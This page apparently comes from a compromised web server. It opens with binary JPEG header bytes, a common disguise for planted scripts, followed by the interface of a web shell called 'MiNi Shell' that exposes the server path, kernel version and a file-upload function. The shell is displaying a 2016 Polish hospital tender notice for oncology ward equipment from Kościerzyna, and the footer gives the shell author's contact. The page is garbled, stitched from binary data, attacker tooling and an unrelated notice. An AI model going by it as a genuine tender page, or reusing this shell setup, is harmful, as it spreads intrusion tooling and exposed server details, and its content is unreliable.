JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160525/133306-N-2016.html

<p class="kh_header"><b>Kościerzyna: DZP/24/16 WYPOSAŻENIE DLA ODDZIAŁU ONKOLOGII</b><br>
<b>Numer ogłoszenia: 133306 - 2016; data zamieszczenia: 25.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Kościerzynie Sp. z o.o. , ul. Piechowskiego 36, 83-400 Kościerzyna, woj. pomorskie, tel. 58 686 01 31, faks 58 686 01 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-koscierzyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: PODMIOT PRAWA HANDLOWEGO.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DZP/24/16 WYPOSAŻENIE DLA ODDZIAŁU ONKOLOGII.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu medycznego, w podziale na  zadania:
ZADANIE.1.Materac przeciwodleżynowy dla pacjentów dorosłych (1szt)
ZADANIE.2.Materac przeciwodleżynowy dla pacjentów bariatrycznych (1szt)
ZADANIE.3.Łóżko podstawowe z materacem (9szt)
ZADANIE.4.Wózek na czystą i brudną bieliznę (1szt)
ZADANIE.4.Stelaż otwarty na brudną bieliznę operacyjną (1szt)
ZADANIE.5.Łóżko wielofunkcyjne (4szt)
ZADANIE.6.Pompa infuzyjna (4szt)
ZADANIE.7.Waga elektroniczna kolumnowa (1szt)
ZADANIE.8.Stanowisko do pobierania krwi (1szt)
ZADANIE.9.Parawan teleskopowy (6szt)
ZADANIE.9.Parawan teleskopowy jezdny (2szt)
ZADANIE.10.Stolik narzędziowy typu Mayo (1szt)
ZADANIE.10.Stolik narzędziowy typu Mayo (1szt)
ZADANIE.11.Szafka przyłóżkowa szpitalna (13szt)
ZADANIE.11.Szafka przyłóżkowa szpitalna (5szt) dla Hospicjum
ZADANIE.12.Wózek opatrunkowy (1szt)
ZADANIE.13.Wózek zabiegowy do przewozu leków wielofunkcyjny (1szt)
ZADANIE.13.wózek z tacami na leki (1 szt) dla Hospicjum 
ZADANIE.14.Pompa do żywienia pozajelitowego (2szt)
ZADANIE.15.Pulsoksymetr przenośny (2szt)
ZADANIE.16.Stolik opatrunkowy (1 szt.)
ZADANIE.17.Wiadro mobilne (1 szt.)
ZADANIE.18.Taboret (5szt)
ZADANIE.19.Szafka anestezjologiczna (1 szt)
ZADANIE.20.Statyw do kroplówek (5 szt)
ZADANIE.21.Nebulizator (1szt)
ZADANIE.21.Nebulizator  (2 szt.) dla Hospicjum
ZADANIE.22.Wózek anestezjologiczny z wyposażeniem (1 szt.)
ZADANIE.22.Wózek anestezjologiczny podstawowy (1 szt.)
ZADANIE.23.Wanna przewoźna (1 szt.) dla Hospicjum.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 23.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE JEST WYNAGANE</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.1.	Zamawiający nie konkretyzuje powyższego warunku.
1.2.	Zamawiający dokona oceny spełnienia powyższego warunku na  podstawie:
a.	oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust.1 pkt. 1 PZP,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.1.	Wykonawca jest zobowiązany wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał: dla zadania 1 - co najmniej 2 dostawy materacy przeciwodleżynowych dla pacjentów dorosłych o łącznej wartości min. 3000 zł brutto, 
dla zadania 2 - co najmniej 2 dostawy materacy przeciwodleżynowych dla pacjentów bariatrycznych o łącznej wartości min. 8 000 zł brutto, 
dla zadania 3 - co najmniej 2 dostawy łóżek podstawowych z materacem o łącznej wartości min. 63000 zł brutto,
dla zadania 4 - co najmniej 2 dostawy wózków na czystą i brudną bieliznę o łącznej wartości min. 5000 zł brutto,
dla zadania 5 - co najmniej 2 dostawy łóżek wielofunkcyjnych o łącznej wartości min. 52000 zł brutto,
dla zadania 6 - co najmniej 2 dostawy pomp infuzyjnych o łącznej wartości min. 40 000 zł brutto,
dla zadania 7 - co najmniej 2 dostawy wag elektronicznych kolumnowych, o łącznej wartości min. 3700 zł brutto,
dla zadania 8 - co najmniej 2 dostawy stanowisk do pobierania krwi, o łącznej wartości min. 1800 zł brutto,
dla zadania 9 - co najmniej 2 dostawy parawanów teleskopowych, o łącznej wartości min. 4240 zł brutto,
dla zadania 10 - co najmniej 2 dostawy stolików narzędziowych typu Mayo, o łącznej wartości min. 6400 zł brutto,
dla zadania 11 - co najmniej 2 dostawy szafek przyłóżkowych szpitalnych, o łącznej wartości min 57000 zł brutto,
dla zadania 12 - co najmniej 2 dostawy wózków opatrunkowych, o łącznej wartości min. 9600 zł brutto,
dla zadania 13 - co najmniej 2 dostawy wózków zabiegowych, o łącznej wartości min. 8 600 zł brutto,
dla zadania 14 - co najmniej 2 dostawy pomp do żywienia pozajelitowego, o łącznej wartości min. 20 000 zł brutto,
dla zadania 15 - co najmniej 2 dostawy pulsoksymetrów przenośnych, o łącznej wartości min. 6000,00 zł brutto,
dla zadania 16 - co najmniej 2 dostawy stolików opatrunkowych, o łącznej wartości min. 1600,00 zł brutto,
dla zadania 17 - co najmniej 2 dostawy wiader mobilnych, o łącznej wartości min. 1100,00 zł brutto,
dla zadania 18 - co najmniej 2 dostawy taboretów, o łącznej wartości min. 3600,00 zł brutto,
dla zadania 19 - co najmniej 2 dostawy szafek anestezjologicznych, o łącznej wartości min. 14000,00 zł brutto,
dla zadania 20 - co najmniej 2 dostawy statywów do kroplówek , o łącznej wartości min. 3000zł brutto,
dla zadania 21 - co najmniej 2 dostawy nebulizatorów, o łącznej wartości min. 1800,00 zł brutto,
dla zadania 22 - co najmniej 2 dostawy wózków anestezjologicznych, o łącznej wartości min. 48000,00  zł brutto,
dla zadania 23 - co najmniej 2 dostawy wanien przewoźnych, o łącznej wartości min. 20000,00 zł brutto.
2.2.	Jeżeli Wykonawca będzie polegał na wiedzy i doświadczeniu innych podmiotów na podstawie art. 26 ust. 2.b. PZP, to wymaga się dołączenia do oferty zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
2.3.	Zamawiający dokona oceny spełnienia powyższego warunku na  podstawie:
a.	oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust.1  pkt. 2 PZP,
b.	wykazu wykonanych dostaw, odrębnie dla każdego zadania,
c.	dokumentów potwierdzających, że dostawy zostały wykonane  należycie,
d.	zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania zamówienia - odpowiednio.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.1.	Zamawiający nie konkretyzuje powyższego warunku.
3.2.	Zamawiający dokona oceny spełnienia powyższego warunku na  podstawie:
a.	oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt. 3 PZP,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1.	Zamawiający nie konkretyzuje powyższego warunku.
4.2.	Zamawiający dokona oceny spełnienia powyższego warunku na  podstawie:
a.	oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt. 3 PZP,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>5.1.	Zamawiający nie konkretyzuje powyższego warunku.
5.2.	Zamawiający dokona oceny spełnienia powyższego warunku na  podstawie:
a.	oświadczenia o spełnieniu warunku udziału w postępowaniu, o którym mowa w art. 22 ust. 1 pkt. 4 PZP</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Formularz cenowy.
Zestawienie parametrów i warunków wymaganych.
Dokumenty dopuszczające zaoferowane urządzenie do obrotu i używania zgodnie z wymogami ustawy  o wyrobach medycznych z dnia 20 maja 2010r. (Dz.U z 2010r. nr 107, poz. 679 z późn. zm.  (deklaracja zgodności lub certyfikat CE).
Zgłoszenie wyrobu lub powiadomienie Prezesa Urzędu RPL WMiPB.
Oryginalny prospekt producenta.
Warunki gwarancji, serwisu  i serwisku pogwarancyjnego.
Dokument potwierdzający autoryzację serwisu wskazanego w załączniku nr 3.
Oświadczenie, że przedmiot zamówienia będzie wykonany przy zastosowaniu materiałów, narzędzi i urządzeń  posiadających wymagane świadectwa, certyfikaty, atesty i dopuszczenia do obrotu i używania oraz spełniających wszystkie normy i wymagania  zgodnie z obowiązującymi przepisami prawa i dyrektyw unijnych w przedmiotowym zakresie  - treść oświadczenia umieszczona jest w druku OFERTA, który stanowi załącznik do SIWZ.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Druk OFERTA, stanowiący załącznik do SIWZ.
Pełnomocnictwo do podpisania oferty, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu do właściwego organu rejestracyjnego. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego, powinno zawierać pieczęć wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
a.	Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy (pełnomocnictwo należy dołączyć do oferty),
b.	do oferty należy dołączyć dokumenty, o ile są wymienione w pkt. VI.2 SIWZ,  potwierdzające, że każdy z warunków określonych w pkt. V.A. SIWZ (art. 22 ust. 1ustawy PZP) spełnia co najmniej jeden z tych Wykonawców albo wszyscy Wykonawcy wspólnie,
c.	oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy PZP (pkt. V.A. SIWZ)  składa co najmniej jeden Wykonawca albo wszyscy Wykonawcy wspólnie.
d.	dokumenty (wymienione w pkt. VI.3 SIWZ) potwierdzające, że Wykonawca nie podlega wykluczeniu (art. 24 ust. 1ustawy PZP) składa każdy z Wykonawców oddzielnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - OKRES GWARANCJI - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-koscierzyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny w Kościerzynie Sp. z o.o.
83-400 Kościerzyna
ul. A. Piechowskiego 36.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.06.2016 godzina 10:00, miejsce: Szpital Specjalistyczny w Kościerzynie Sp. z o.o.
83-400 Kościerzyna
ul. A. Piechowskiego 36
KANCELARIA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com